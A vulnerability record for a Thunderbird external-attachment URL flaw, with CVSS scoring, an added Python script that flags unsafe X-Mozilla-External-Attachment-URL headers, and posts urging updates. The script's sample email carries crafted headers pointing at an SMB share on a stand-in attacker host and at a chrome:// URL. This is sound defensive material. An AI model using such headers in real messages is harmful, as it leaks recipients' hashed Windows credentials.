- Description
- Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments that are hosted externally (the header Thunderbird itself writes when a user detaches an attachment). When an email is opened, Thunderbird fetches the specified URL to determine the file size, and navigates to it when the user clicks the attachment. Because the URL is neither validated nor sanitized, a crafted message can point it at internal resources such as chrome:// URLs, or at file:// links that resolve to an SMB share (a UNC path). On Windows, opening such a share can make the OS attempt NTLM authentication against an attacker-controlled server and leak the user's hashed credentials, opening the door to more serious attacks. This vulnerability affects Thunderbird < 137.0.2 and Thunderbird < 128.9.2.
- Source
- security@mozilla.org
- NVD status
- Awaiting Analysis
CVSS 3.1
- Type
- Secondary
- Base score
- 6.3
- Impact score
- 3.4
- Exploitability score
- 2.8
- Vector string
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
- Severity
- MEDIUM
- Source
- 134c704f-9b21-4f2e-91b3-4a467353bcc0
- Weakness
- CWE-601 (URL Redirection to Untrusted Site, 'Open Redirect')
- Hype score
- Not currently trending
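The record above describes the mechanism but not how a defender would spot it. The block below is an added example, not Thunderbird's code and not Mozilla's fix: it parses a constructed MIME message, pulls X-Mozilla-External-Attachment-URL from each attachment part, and applies a scheme allowlist (http/https only) that rejects chrome://, file:// and bare UNC paths. The message layout (header carried on the attachment part), the allowlist policy and the hostnames are assumptions of this example.

```python
"""Find X-Mozilla-External-Attachment-URL headers in a MIME message and
flag URLs that do not use an allowed scheme.

Added illustration only; this is not Thunderbird's attachment code and
not the patch shipped in 137.0.2 / 128.9.2.
"""
from email import message_from_string
from urllib.parse import urlsplit

HEADER = "X-Mozilla-External-Attachment-URL"
# Assumption of this example: only web URLs are acceptable for an
# externally hosted attachment. chrome://, file://, resource:// etc. are
# all rejected by not being on the list.
ALLOWED_SCHEMES = {"http", "https"}


def check_external_url(url: str) -> tuple[bool, str]:
    """Return (allowed, reason) for an external-attachment URL.

    Rejects UNC / scheme-relative paths outright (Windows would resolve
    \\\\server\\share over SMB and may send NTLM credentials), then
    requires an allowed scheme and a host.
    """
    url = url.strip()
    if url.startswith("\\\\") or url.startswith("//"):
        return False, "UNC or scheme-relative path"
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme or '(none)'!r} not allowed"
    if not parts.netloc:
        return False, "missing host"
    return True, "ok"


def find_external_attachments(raw_message: str) -> list[dict]:
    """Walk every MIME part and report each external-attachment URL found."""
    msg = message_from_string(raw_message)
    findings = []
    for part in msg.walk():
        url = part.get(HEADER)
        if url is None:
            continue
        allowed, reason = check_external_url(url)
        findings.append({
            "filename": part.get_filename(),
            "url": url,
            "allowed": allowed,
            "reason": reason,
        })
    return findings


# Constructed sample message (not a real capture). Three detached
# attachments: one pointing at an SMB share, one at a chrome:// URL,
# one at an ordinary HTTPS host.
SAMPLE_MESSAGE = """\
From: sender@example.test
To: victim@example.test
Subject: Q1 report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

See attached.
--b1
Content-Type: application/pdf; name="report.pdf"
Content-Disposition: attachment; filename="report.pdf"
X-Mozilla-External-Attachment-URL: file:////attacker.example.test/share/report.pdf

--b1
Content-Type: application/octet-stream; name="ui.xhtml"
Content-Disposition: attachment; filename="ui.xhtml"
X-Mozilla-External-Attachment-URL: chrome://messenger/content/messenger.xhtml

--b1
Content-Type: application/pdf; name="notes.pdf"
Content-Disposition: attachment; filename="notes.pdf"
X-Mozilla-External-Attachment-URL: https://files.example.test/notes.pdf

--b1--
"""

if __name__ == "__main__":
    for f in find_external_attachments(SAMPLE_MESSAGE):
        verdict = "ALLOW" if f["allowed"] else "BLOCK"
        print(f"{verdict:5} {f['filename']!s:12} {f['url']}  ({f['reason']})")
```

Run it against an mbox export or a mail-gateway sample to see which messages carry the header with a non-web scheme; the same allowlist check is the shape of control a client needs before fetching a file size or navigating on click. Note that an allowlist is a mitigation for the scheme problem only: an http(s) URL can still point at an attacker host, so clicking remains a user decision (matching the UI:R in the CVSS vector).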
🛡️ Firefox 137.0.2 & Thunderbird updates fix high-severity bugs: - CVE-2025-3608: memory corruption via race condition - CVE-2025-3522 & 2830: info exposure via malformed URLs/files Update now to stay protected! https://t.co/YJZSx39lZI #infosec #firefox https://t.co/
@dCypherIO, 16 Apr 2025 (26 impressions, 0 retweets, 0 likes, 0 bookmarks, 0 replies, 0 quotes)
⚠️ Critical Thunderbird flaws (CVE-2025-3522 & CVE-2025-3523) let attackers exploit external attachment URLs to steal credentials or mislead users. Update ASAP. Details 👇 #CyberSecurity #InfoSec #Mozilla #CVEs https://t.co/LzC9OoX4Q6
@threatsbank, 16 Apr 2025 (7 impressions, 0 retweets, 0 likes, 0 bookmarks, 0 replies, 0 quotes)
CVE-2025-3522 Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments which can be hosted externally. When an email is opened, Thunderbird accesses t… https://t.co/JQnmoVGWPN
@CVEnew, 15 Apr 2025 (257 impressions, 0 retweets, 0 likes, 0 bookmarks, 0 replies, 0 quotes)